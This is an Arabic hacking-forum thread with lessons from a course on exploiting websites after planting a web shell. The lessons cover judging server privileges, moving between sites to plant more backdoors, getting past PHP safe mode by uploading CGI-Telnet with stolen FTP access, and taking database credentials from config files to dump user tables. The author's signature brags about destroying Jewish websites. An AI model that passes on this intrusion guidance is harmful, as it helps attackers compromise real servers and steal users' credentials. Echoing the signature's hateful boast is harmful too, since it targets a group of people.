الصلاحيات هي حالة المخترق بعد رفع الشل على أحد المواقع وهي تخص حماية السيرفر وقدرتك على التحكم والتنفيذ في الشل وفي الغالب تكون إحدى هذه الصلاحيات إما (نوبدي) أو (يوزر) أو (اباتشي).


مافائدة معرفة الصلاحيات ؟
بعد معرفة صلاحيتك على السيرفر تستطيع تحديد ماتريد فعله والتخطيط لكيفية الوصول إلى الهدف لأن من صلاحيه إلى صلاحيه يوجد اختلافات
ويوجد عوائق تواجهك في الأختراق.


من الذي يتحكم بهذي الصلاحيات ؟
مدير السيرفر والذي يسمى بـ (root) .. فقد تجد سيرفر بعد زرع الشل أن صلاحيتك nobody وقد تجد سيرفر أخر صلاحيتك فيه غير ذالك
أي أن الصلاحيات تختلف من سيرفر إلى سيرفر على حسب حمايته وعلى حسب مايحدده مدير السيرفر.


كيف تعرف صلاحيتك على السيرفر ؟
تستطيع من الشل مباشرة وهذي صوره توضح مكان تواجد الصلاحيات وهي (نوبدي)
[]

أو تقوم بتنفيذ أمر "id" في الشل لأضهار الصلاحيات مثل ماذكرنا في الدروس السابقه


ذكرت ثلاث انواع من الصلاحيات وراح نتكلم عن كل نوع بالتفصيل ان شاء الله


1- نوبدي (nobody)
في الكثير من السيرفرات تجد هذي الصلاحية ومن رأيي هي أفضل الصلاحيات لجمع أكبر قدر من المعلومات في السيرفر
::مميزاتها::
تمكنك التنقل في السيرفر من موقع إلى أخر
وتستفيد من هذي الميزة في زرع المزيد من ملفات التجسس لضمان بقائك على السيرفر لمدة أطول
يوجد شرح عملي في المرفقات بأسم (nobody) على سيرفر صلاحياتي فيه nobody راح اوضح عليه كيفية التنقل من موقع إلى أخر.
-أخلي الباقي في الأستفادة من النوبدي على تفكيرك وقت الإختراق لأنك تستطيع فعل الكثير !!



2- يوزر
هذه الصلاحيه من الصلاحيات المعقده نوعاً ما .. في بعض الأحيان تكون من احلى مايكون وجودها وبعض الأحيان زراعتك للشل مثل عدمه (إن كان هناك هدف معين على السيرفر)
مثال بسيط لمعرفة شكل صلاحيات اليوزر
نفترض أن مسارك بعد رفع الشل هكذا :
/ home / asdely / public_html /
ونضرت إلى الصلاحيات ولقيتها بهذا الشكل:
uid=906(asdely) gid=906(asdely) groups=906(asdely)
كما تشاهد ان الي بين الأقواس "asdely" هو نفس اليوزر الي في المسار المفترض
في هالحاله على طول تعرف أن صلاحياتك يوزر !!
*ملاحظه: 906= هذا الرقم متغير وليس ثابت ممكن يتغير إلى أي رقم أخر
:: مميزاتها ::
انك ماتحتاج إلى تصريح 777 أو غيره عشان تعدل على ملف او ترفع ملف .. الخ
لأن اذا شفت هذي الصلاحيات معناته كأنك مدير الموقع الي أنت عليه وتقدر تنفذ أي شي تبيه !!
:: عيوبها ::
ماتقدر تتنقل إلى باقي المواقع الي على السيرفر او تشوف أي معلومه منها
فقط تستطيع فعل كل شي في الموقع الي أنت عليه .. أن كان هو هدفك .. معناته راح خبر كان : )
وأن كان هدفك على نفس السيرفر وتبي توصله من الشل الي رفعته .. فللأسف مالك الا أنك تبحث عن ثغرات في نفس الهدف
لأن من الشل الي رفعت ماتقدر توصله ولا تقدر توصل لغيره .
يوجد شرح عملي في المرفقات بأسم (user) للتطبيق على شل صلاحيات يوزر.
-اتمنى محد ياخذ كلامي فقط ويترك عقله .. فكر يمكن تتخطى هذي المشكلة او يوجد ثغرة تتعدا هذي العقبه .. مافيه شي مستحيل !!



3- اباتشي (apache)
هذه الصلاحيات شبيهه إلى nobody في التحكم إلا أن مسارك على الشل سيكون شكله مختلف في الغالب


- يوجد بعض الصلاحيات تكون شكلها غير الثلاث المذكوره وفي الغالب تكون شبيهه لـ apache تعامل معها مثل الأباتشي.


*تنبيه: لا تعتمد على تجربة في اي سيرفر وتثبتها في عقلك سواء كانت بنتيجه مفيده او غير مفيده لأن سيرفر عن سيرفر تختلف حمايتة !!

تحياتي


الدرس السادس

الوضع الامن

بسم الله الرحمن الرحيم


السلام عليكم ورحمة الله وبركاته


حياكم الله أخواني اليوم ناخذ درس جديد وأن شاء الله يستفيد منه الجميع


درسنا السادس عن:


|| الوضع الأمن - Safe Mode ||


يقف الكثير منا بعد مايزرع الشل اذا شاف الـ safemode = On
وهي تعني أن الوضع الأمن مفعل وراح يسبب لك بعض العوائق في الأختراق والوصول إلى المعلومات
لاكن ضهرت ثغرات الـ php التي تمكننا من تخطي هذي العوائق وسوف نتطرق لها في درسنا ان شاء الله


أولاً: ماهو السيف مود (Safe Mode)؟
هي حماية موجودة داخل مترجم الـ php وعند تفعيله يمنعك من فعل اشياء كثيرة بسبب تعطيل دوال الـ php التي تسبب خطر على السيرفر
مثل الدوال التي من خلالها تستطيع تنفيذ الأوامر .



ثانياً: لماذا تختفي خانة تنفيذ الأوامر في الشل عندما يكون السيف مود مفعل؟
مثل ماذكرنا أن عند تفعيل السيف مود تتعطل الدوال الخطيرة على السيرفر الموجوده في لغة البرمجه php والتي في الغالب يكون ملف التجسس مبرمج بواسطتها
وسبب أختفاء سطر الأوامر هو تعطيل الدوال التي يمكن تنفيذ الأوامر من خلالها مثل (system , shell_exec , exec) وغيرها
مع العلم أن بإمكان مدير السيرفر إضافة المزيد من الدوال لتعطيلها وأي دالة تعطل يصير مالها مفعول ولا تأدي وظيفتها في السيرفر
وفي هذي الحالة تزيد حماية السيرفر ويصعب عليك تنفيذ الأوامر وجمع المعلومات.


ويسأل البعض هل عند وجود الوضع الأمن مفعل والصلاحيات نوبدي او اباتشي يمنعني من التنقل والوصول إلى ملفات المواقع الأخرى؟
الجواب لا .. لأن ممكن الوصول الى ملفات المواقع الأخرى وقرائتها وليس بشرط أن ترى محتوى الموقع لاكن المطلوب هو معرفة
(مسارات الملفات) التي ممكن من خلالها جمع معلومات تفيدك في الأختراق مثل ملف config الذي في الغالب يحفظ بداخله معلومات قاعدة بيانات السكربت.. وان شاء الله راح اخصص لهذي النقطه درس


عند الحصول على معلومات أي قاعدة بيانات كيف استفيد منها ؟
بالأمكان رفع سكربت اتصال بقواعد البيانات مثلما رفعت ملف التجسس في البداية
وفي هذي الحالة تتصل بالقاعدة التي تملك معلوماتها وبعد ذالك بالأمكان محاولة زرع الشل في القاعدة
وعند زراعتة يمكنك من مشاهدة محتوى الموقع بأذن الله .. وعند عمل هذي الطريقة بالأمكان الأنتقال إلى الموقع المستهدف إن شاء الله
وفي الغالب تستخدم هذي الطريقه إن كان هناك هدف ما على السيرفر تبي توصل له !!



بعد القليل من الأستفسارات ننتقل إلى معرفة المزيد عن السيف مود
صورة لمعرفة مكان حالة السيف مود في الشل


safe_mode
وهي تعني حالة الوضع الأمن وسيكون أمامها (On) أو (Off)
Disable functions
وهنا يعرض لنا الدوال المعطله وسوف تجد امامها إما (الدوال) أو كلمة (NONE) وهي تعني أنه لايوجد دوال معطلة


ذكرت أن بالأمكان تخطي الوضع الأمن بأستخدام ثغرات الـPHP مثل دالة copy و CURL و id ...الخ
ويوجد الكثير منها في الشل المطور من الأخ المهاجر22
البعض يريد سطر الأوامر في حالة تفعيل الوضع الأمن ليقوم بتنفيذ بعض الأوامر الخارجية التي يحتاجها في الأختراق
هنا تقف على شرطين لتنفيذ هذا الشي:
1- الحصول على معلومات FTP لأي موقع على السيرفر
2- يوجد أمكانية لتشغيل سكربت CGI-Telnet في السيرفر لأن بعض السيرفرات لا تستطيع تشغيل هذا السكربت
الشرط الأول بيد المخترق وشطارته في جميع المعلومات
أما الشرط الثاني بيد مدير السيرفر "root"
إذا السيرفر يسمح لتشغيل سكربت CGI-Telnet فأنت تستطيع تنفيذ الأوامر بأستخدام هذا السكربت


:: طريقة استخدام CGI-Telnet ::
أول شي تتصل بالموقع الي معك معلوماته عن طريق أحد برامج الـftp
ثم تدخل على مجلد public_html وتقوم برفع السكربت بداخل مجلد cgi-bin
أي سيكون مسار السكربت :
/ home / ××× / public_html / cgi-bin / cgi-telnet.pl
cgi-telnet.pl= السكربت
بعد رفع السكربت تعطيه تصريح 755 ومن ثم تستعرضه في المتصفح
راح يكون الرابط بهذا الشكل:
http://www.××××.com/cgi-bin/cgi-telnet.pl
http://www.××××.com/ = الموقع
cgi-bin = المجلد الي رفعنا بداخله سكربت CGI-Telnet
cgi-telnet.pl = سكربت CGI-Telnet
إذا أشتغل السكربت معناته تمام بالأمكان تنفذ الأوامر الي تحتاجها
طبعاً ماذكر أعلاه الطريقة بأختصار !!

تحياتي


الدرس السابع والاخير

السلام عليكم ورحمة الله وبركاته

درسنا السابع عن

|| كيفية الأتصال بقواعد البيانات والأستفاده منها ||


أولاً ماهي قواعد البيانات ؟
من أسمها تعرف انه شي يحتفظ بـ البيانات وتوجد هذه القواعد مع كل سكربت لحفظ أي شي يضاف الى السكربت
في الغالب كل سكربت يكون له قاعدة بيانات مثل الأن سكربت vBulletin الي نستخدمه في جيوش الهكرز
كيف يحفظ المواضيع ؟؟ والعضويات ؟؟ وكل جديد في المنتدى ؟؟
ايضاً كيف إذا حدثت مشكلة أو عطل تسبب في ايقاف المنتدى تلاحظ انه بمجرد استعادة قاعدة البيانات من قبل الإدارة يعود كل شي مثل ماكان عليه والسبب أنه يوجد للسكربت قاعدة بيانات.

ثانياً أين توجد قواعد البيانات ؟
قواعد البيانات تكون محفوظه في السيرفر وفي أماكن أمنه وتحمل تصاريح لايمكن الوصول إليها إلا اذا كنت مدير السيرفر (root)

ثالثاً هل ممكن الأطلاع على بيانات هذي القواعد .. وكيف ؟
نعم ممكن .. لاكن يشترط عليك توفر ثلاث أشياء للأتصال بـ قاعدة البيانات وهي:
1- معرفة يوزر القاعدة
2- معرفة الباسورد للقاعدة
3- معرفة أسم القاعدة

رابعاً أين أجد [ يوز القاعدة + الباسورد + أسم القاعدة ] ؟
تجد هذي المعلومات (في الغالب) داخل ملف يحمل هذا الأسم (config) وهذا الملف طبعاً يكون من ظمن ملفات السكربت الي تبي تتصل بقاعدة بياناته
واسم الملف الي بداخله معلومات القاعدة في الغالب يكون احد هذي الأسماء :
config.php
config.inc.php
settings.php
وغيرها ...
ايضاً في الغالب تجد هذا الملف في المجلد الرئيسي للسكربت أو داخل مجلد اسمه [includes أو include أو inc]

خامساً كيف تتصل بقاعدة البيانات بعد حصولك على معلوماتها ؟
يوجد سكربتات خاصة لقواعد البيانات ايضاً يوجد الكثير من الشلات تحمل ميزة الأتصال بقواعد البيانات مثل شل c99
وعند الأتصال بالقاعدة تكون البيانات موجودة بداخل الجداول وبشكل مرتب !!

سادساً كيف استفيد من بيانات القاعدة وماهو المهم في جداولها ؟
أكثر شي يهمنا في قاعدة البيانات هو جدول user لأن يوجد بداخله اسماء المستخدمين وباسورداتهم وأيميلاتهم
طبعاً الباسوردات في الغالب تكون مشفرة تشفير md5.

المصطلحات الموجودة في السكربتات لـ [ يوز القاعدة - باسورد القاعدة - أسم القاعدة ]
يوزر القاعدة:
username
DBUSER
db_user
dbusername
نلاحظ انه يتكرر في المصطلح كلمة (user)
---
باسورد القاعدة:
password
DBPASS
db_pass
DB_PASSWORD
dbpassword
---
أسم القاعدة:
database
dbname
db_name
dbuname

ملاحظة: ليست هذي جميع المصطلحات .. قد تجد مصطلحات غير هذي لاكن راح تكون شبيهه لها ان شاء الله

انتهى الدرس وأنتهت الدورة حتى إشعار آخر
ملاحظة: جميع صور الدروس تحفظ كمرفق لضمان عدم ضياعها ولكن هذا الدرس لا يوجد فيه صور لذلك لا يوجد مرفق

تحياتي للجميع وعلى الله الكل استفادوا من الدورة

تحياتي



آخر مواضيع » DR.X

توقيع : DR.X

DR.X




stop my if you can

كان بوسعي ان ابيد مواقع اليهود كلها ولكني تركت بعضا منها ليحكوا لكم لماذا كنت ابيدهم


[email protected]
[email protected]

عرض البوم صور DR.X   رد مع اقتباس
قديم 17/08/2010, 22:13   المشاركة رقم: 2
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

مجهود رائع اخي
بارك الله فيك
تحيتي لك

عرض البوم صور WOLF_DZ   رد مع اقتباس
قديم 18/08/2010, 09:36   المشاركة رقم: 3
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

مجهود رائع اخي
دورة تستاهل التثبيت
بارك الله فيك واصل في طرح المواضيع المهمه >
تحيتي لك

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 18/08/2010, 16:52   المشاركة رقم: 4
المعلومات
الكاتب:
 Ev!LScR!pT_Dz  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
Ev!LScR!pT_Dz غير متواجد حالياً
وسائل الإتصال:

دورة جميلة لكن من المفروض ان تكون هناك دروس فيديو.
المعم مشكور على المجهود....

عرض البوم صور Ev!LScR!pT_Dz   رد مع اقتباس
قديم 12/08/2011, 23:18   المشاركة رقم: 5
المعلومات
الكاتب:
 sofyan-c4  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
sofyan-c4 غير متواجد حالياً
وسائل الإتصال:

****اااااااا يا غاااااااااااااالي محتاااااااااج هيك دورة من زماااااااان

عرض البوم صور sofyan-c4   رد مع اقتباس
قديم 12/08/2011, 23:27   المشاركة رقم: 6
المعلومات
الكاتب:
 S4wDz  
اللقب:
[{ عضو مميز }]

الإتصالات
الحالة:
S4wDz غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك اخي العزيز

عرض البوم صور S4wDz   رد مع اقتباس
قديم 09/01/2012, 12:25   المشاركة رقم: 7
المعلومات
الكاتب:
 ilyas0206=DZ  
اللقب:
.: مشرف قسم الالعاب :.

الإتصالات
الحالة:
ilyas0206=DZ غير متواجد حالياً
وسائل الإتصال:

mercii !!!

عرض البوم صور ilyas0206=DZ   رد مع اقتباس
قديم 24/09/2013, 18:37   المشاركة رقم: 8
المعلومات
الكاتب:
 gthomps  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
gthomps غير متواجد حالياً
وسائل الإتصال:

موضوع في القمة **** لك

عرض البوم صور gthomps   رد مع اقتباس
قديم 25/10/2014, 13:16   المشاركة رقم: 9
المعلومات
الكاتب:
 ZAZA  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
ZAZA غير متواجد حالياً
وسائل الإتصال:

مشكور واصل يابطل

عرض البوم صور ZAZA   رد مع اقتباس
قديم 12/05/2015, 01:58   المشاركة رقم: 10
المعلومات
الكاتب:
 cyberg  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
cyberg غير متواجد حالياً
وسائل الإتصال:

thankssss

عرض البوم صور cyberg   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 97
Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅ , 0x0 , 3bjo , Abu Hassan , airami , alferoz , ALOORD-XD , Anis Gladiator , anonyx , anwaraze , Arnodz , ملاك144 , هكر الاسكان , blandy26 , bouziane31000 , chevr0sky , Code-x HaCkEr , cyberg , الهكر الاخلاقي , امير الشمال , احمد العلوني , ارهابي 511 , D7OMI , Damane2011 , dark21 , Dr.wolf , DR.X , DZ-cOmbattant , Ev!LScR!pT_Dz , fawaz , granisEOU , gthomps , H3ll-dz , hacker almooot , Hacker Man , HACKER==MAN , hacoo0 , hamza 12 , illuminat , ilyas0206=DZ , جوبا العراقي , حكمي , JusT HaCkEr , KinG Of PiraTeS , liberter02 , luop1980 , m.mohammed , Mafia Boy , mahmad , mark94 , marwane , maspix , matrixx , mbsoft , MdMn HaCk3r , Mdz , MjrM TabuK , mo3eth , mohmax , Mr-viros , Mr.NoD , mr.tr0s , Mrbwsh , رعد , o0o , okita0039 , osski21 , سجين الوطن , Power_Dz , rabi3o_gabes , raouf160 , S1LV3rS3rf3r , S4wDz , Silver-39 , sofyan-c4 , srorr , T!frani-hk , Th3 WiTch3r-Dz , ThE ProF , TheMino , علي المسافر , عمر الساكر , عامر شعري , عاشق الحور , vinex23 , ViRuS_Ra3cH , wald-driouch , WaLiD_KouKi , waxer , WOLF_DZ , wXer , yasMouh , فيصل غول , zakariae123 , ZAZA , ZiRbE$t , zodiac

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تحديث الصفحة دورة كاملة لكشف التلغيم (مؤقت) انور العراقي [ مـنتدى حمايه الـبريد الالكتروني | Hacking E-mails ] 4 21/11/2014 13:20
دورة كاملة مع دروس عن الميتا سبلوت DR.X [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] 12 09/01/2014 19:37
دورة كامله عن اختراق المنتديات شل+التصاريح+الصلاحيات ارجو التثبيت DR.X [ الدورات العامة ] 8 27/09/2013 01:37

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 03:37.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115